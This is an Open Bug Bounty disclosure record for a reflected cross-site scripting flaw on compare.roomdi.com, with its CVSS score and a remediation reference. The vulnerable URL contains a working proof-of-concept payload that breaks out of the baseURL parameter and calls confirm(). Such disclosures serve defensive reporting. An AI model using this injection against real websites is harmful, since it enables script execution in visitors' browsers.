compare.roomdi.com XSS vulnerability

2017-12-01T10:32:00
ID OBB:446113
Type openbugbounty
Reporter Random_Robbie
Modified 2018-03-01T10:32:00

Description

Open Bug Bounty ID: OBB-446113

Description| Value
---|---
Affected Website:| compare.roomdi.com
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://compare.roomdi.com/rates/search/index.php?hotelID=17818&checkInDate;=12/11/2017&checkOutDate;=12/12/2017&rooms;=1&guests;=2&publisherID;=2608&referralURL;=http%3A%2F%2Fwww.roomdi.com%2Fhotel%2F%3Flang%3Den%26check_in%3D11%252F12%252F2017%26option%3D16%26hotel%3D205026%26utm_source%3Dtripadvisor%26client%3Dtripadvisor%26utm_medium%3Dsearch%26rooms%3D30%252C30%26nswid%3DapdQT4jaFOiw7PxnGcFPcB2XvbVDmkPkw6FL%252FmpzQ2kP91NFCgx8eWnrhuHBJ7bvBxBBPtbdZJP4tb60LyZM7FC4c9KEyV08b8z%252Bo0l%252F%252FsHoam9KHVwsq82%252BJvexJTzLTwNf9JYLNxvG7O3keoKt%252BCc7ZjuWpabkAg%252BLIRrL5S%252Bkya6vNsxVqjiDVYqPgq3pdLSxeLb2hfvdKsnPPbDte3GHtje40TI9%252BILfat2v4DRcodQLCXFOpwxgI1itde9XMv44H5ho0sJvnllWE82JX%252FIX%252FaUVMIjU94vd2Tglk5me2oQyr6jCD5JTglAiq51TE1YjcVMAJ4nhKuOkxFgPB2hQJ5jgAFbmbCsSqZcunON4xUVmNBZyteQCYwAVCW1E%26sid%3D929fad6c-eb39-409d-aec0-a0c14ed2a324%26check_out%3D12%252F12%252F2017%26market%3Duk%23stay&type;=2&baseURL;=http%3A%2F%2Fcompare.roomdi.com"'--!>confirm(/OPENBUGBOUNTY/)